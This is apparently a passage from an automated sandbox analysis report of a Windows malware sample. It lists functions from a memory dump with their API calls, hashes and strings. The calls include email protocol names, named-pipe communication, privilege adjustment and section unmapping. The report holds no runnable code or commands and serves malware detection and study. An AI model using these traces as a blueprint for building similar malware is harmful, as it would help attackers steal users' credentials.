    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
